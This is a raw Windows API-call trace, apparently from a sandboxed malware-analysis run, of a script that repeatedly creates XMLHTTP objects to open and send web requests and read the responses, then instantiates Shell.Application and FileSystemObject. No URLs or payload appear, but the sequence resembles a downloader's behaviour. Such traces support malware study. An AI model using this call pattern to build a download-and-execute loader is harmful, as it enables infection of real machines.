	[0268.862] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0268.862] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0268.862] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0268.862] SysStringLen (param_1=0x0) returned 0x0
	[0268.862] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0268.862] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0268.862] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0268.862] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0268.862] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7548) returned 0x0
	[0268.862] ??2@YAPEAX_K@Z () returned 0x62f330
	[0268.862] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7548, pUnkSite=0x62f330) 
	[0268.862] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0268.863] XMLHTTPRequest:IUnknown:Release (This=0x49c7548) returned 0x0
	[0268.863] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0268.863] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0268.863] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0268.863] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0268.863] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0268.863] longjmp () 
	[0268.863] longjmp () 
	[0268.863] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0268.863] SysStringLen (param_1=0x0) returned 0x0
	[0268.863] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0268.863] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0268.863] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74a0) returned 0x0
	[0268.863] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0268.863] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7728) returned 0x0
	[0268.863] ??2@YAPEAX_K@Z () returned 0x62f310
	[0268.863] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7728, pUnkSite=0x62f310) 
	[0268.863] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0268.864] XMLHTTPRequest:IUnknown:Release (This=0x49c7728) returned 0x0
	[0268.864] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74a0) returned 0x0
	[0268.864] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74a0) returned 0x3
	[0268.864] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0268.864] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0268.864] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0268.864] longjmp () 
	[0268.864] longjmp () 
	[0268.864] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0268.864] SysStringLen (param_1=0x0) returned 0x0
	[0268.864] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0268.864] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0268.864] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0268.864] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0268.864] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5bb8) returned 0x0
	[0268.864] ??2@YAPEAX_K@Z () returned 0x62f330
	[0268.864] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5bb8, pUnkSite=0x62f330) 
	[0268.864] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0268.864] XMLHTTPRequest:IUnknown:Release (This=0x49c5bb8) returned 0x0
	[0268.865] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0268.865] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0268.865] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0268.865] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0268.865] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0268.865] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0268.865] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0268.865] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0269.978] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0269.978] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0269.978] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0269.978] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0269.978] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0269.978] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0269.978] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0269.978] SysStringLen (param_1=0x0) returned 0x0
	[0269.978] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0269.979] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0269.979] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0269.979] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0269.979] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0269.979] ??2@YAPEAX_K@Z () returned 0x62f350
	[0269.979] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0269.979] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0269.979] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0269.979] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0269.979] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0269.979] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0269.979] SysStringLen (param_1=0x0) returned 0x0
	[0269.979] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0269.982] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0269.982] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0269.982] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0269.982] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0269.982] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0269.982] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0271.448] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0271.448] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0271.448] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0271.449] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0271.449] SysStringLen (param_1=0x0) returned 0x0
	[0271.449] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0271.450] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0271.450] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0271.450] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0271.450] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5aa8) returned 0x0
	[0271.450] ??2@YAPEAX_K@Z () returned 0x62f330
	[0271.450] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5aa8, pUnkSite=0x62f330) 
	[0271.450] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0271.450] XMLHTTPRequest:IUnknown:Release (This=0x49c5aa8) returned 0x0
	[0271.450] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0271.450] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0271.450] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
